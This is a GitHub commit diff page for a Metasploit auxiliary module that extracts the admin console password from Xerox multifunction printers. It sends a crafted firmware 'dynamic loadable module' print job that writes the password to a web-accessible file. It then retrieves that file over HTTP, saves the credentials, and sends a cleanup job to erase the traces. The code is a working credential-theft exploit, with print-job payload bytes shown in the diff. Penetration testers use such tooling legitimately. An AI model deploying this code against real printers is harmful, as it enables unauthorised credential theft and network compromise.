Skip to content

Commit 02b1c5c

Browse files
wchen-r7wchen-r7
committed
Final changes
1 parent 127d164 commit 02b1c5c

File tree

1 file changed

+24
-21
lines changed

1 file changed

+24
-21
lines changed

modules/auxiliary/gather/xerox_pwd_extract.rb

Lines changed: 24 additions & 21 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,8 @@
11
#
2-
# This module requires Metasploit: http//metasploit.com/download
2+
# This module requires Metasploit: http://metasploit.com/download
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
5+
56
require 'msf/core'
67

78
class Metasploit3 < Msf::Auxiliary
@@ -13,7 +14,8 @@ def initialize(info={})
1314
super(update_info(info,
1415
'Name' => 'Xerox Administrator Console Password Extract',
1516
'Description' => %{
16-
This module will extract the management consoles admin password from the Xerox file system using firmware bootstrap injection.
17+
This module will extract the management consoles admin password from the Xerox file system
18+
using firmware bootstrap injection.
1719
},
1820
'Author' =>
1921
[
@@ -31,37 +33,40 @@ def initialize(info={})
3133
], self.class)
3234
end
3335

36+
def jport
37+
datastore['JPORT']
38+
end
39+
3440
# Time to start the fun
3541
def run
36-
print_status("Attempting to extract the web consoles admin password from the Xerox MFP at #{rhost}")
37-
unless write
38-
return
39-
end
42+
print_status("#{rhost}:#{jport} - Attempting to extract the web consoles admin password...")
43+
return unless write
44+
45+
print_status("#{rhost}:#{jport} - Waiting #{datastore['TIMEOUT']} seconds...")
4046
sleep(datastore['TIMEOUT'])
4147
passwd = retrieve
4248
remove
4349

4450
if passwd
45-
print_good("#{rhost}:#{rport} - Password found: #{passwd}")
51+
print_good("#{rhost}:#{jport} - Password found: #{passwd}")
4652

4753
loot_name = 'xerox.password'
4854
loot_type = 'text/plain'
49-
loot_filename = 'xerox-password.text'
55+
loot_filename = 'xerox_password.text'
5056
loot_desc = 'Xerox password harvester'
5157
p = store_loot(loot_name, loot_type, datastore['RHOST'], passwd, loot_filename, loot_desc)
52-
print_status("Credentials saved in: #{p}")
58+
print_status("#{rhost}:#{jport} - Credentials saved in: #{p}")
5359

5460
register_creds('Xerox-HTTP', rhost, rport, 'Admin', passwd)
5561

5662
else
57-
print_status('No credentials extracted')
58-
return
63+
print_error("#{rhost}:#{jport} - No credentials extracted")
5964
end
6065
end
6166

6267
#Trigger firmware bootstrap write out password data to URL root
6368
def write
64-
print_status('Sending print job')
69+
print_status("#{rhost}:#{jport} - Sending print job")
6570
create_print_job = '%%XRXbegin' + "\x0a"
6671
create_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0a"
6772
create_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0a"
@@ -89,18 +94,17 @@ def write
8994
create_print_job << "\x00\x28\x00\x00"
9095

9196
begin
92-
connect(true, 'RPORT' => datastore['JPORT'].to_i)
97+
connect(true, 'RPORT' => jport)
9398
sock.put(create_print_job)
9499
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
95-
print_error("Error connecting to #{rhost}")
96-
return
100+
print_error("#{rhost}:#{jport} - Error connecting to #{rhost}")
97101
ensure
98102
disconnect
99103
end
100104
end
101105

102106
def retrieve
103-
print_status("Retrieving password from #{rhost}")
107+
print_status("#{rhost}:#{jport} - Retrieving password from #{rhost}")
104108
request = "GET /Praeda.txt HTTP/1.0\r\n\r\n"
105109

106110
begin
@@ -110,7 +114,7 @@ def retrieve
110114
passwd = res.match(/\r\n\s(.+?)\n/)
111115
return passwd ? passwd[1] : ''
112116
rescue ::EOFError, ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse, EOFError
113-
print_error("Error getting password from #{rhost}")
117+
print_error("#{rhost}:#{jport} - Error getting password from #{rhost}")
114118
return
115119
ensure
116120
disconnect
@@ -119,7 +123,7 @@ def retrieve
119123

120124
# Trigger firmware bootstrap to delete the trace files and praeda.txt file from URL
121125
def remove
122-
print_status('Removing print job')
126+
print_status("#{rhost}:#{jport} - Removing print job")
123127
remove_print_job = '%%XRXbegin' + "\x0A"
124128
remove_print_job << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "\x0A"
125129
remove_print_job << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "\x0A"
@@ -144,11 +148,10 @@ def remove
144148
remove_print_job << "\x75\xe1\x00\x28\x00\x00"
145149

146150
begin
147-
connect(true, 'RPORT' => datastore['JPORT'].to_i)
151+
connect(true, 'RPORT' => jport)
148152
sock.put(remove_print_job)
149153
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse
150-
print_error("Error removing print job from #{rhost}")
151-
return
154+
print_error("#{rhost}:#{jport} - Error removing print job from #{rhost}")
152155
ensure
153156
disconnect
154157
end

0 commit comments

Comments
 (0)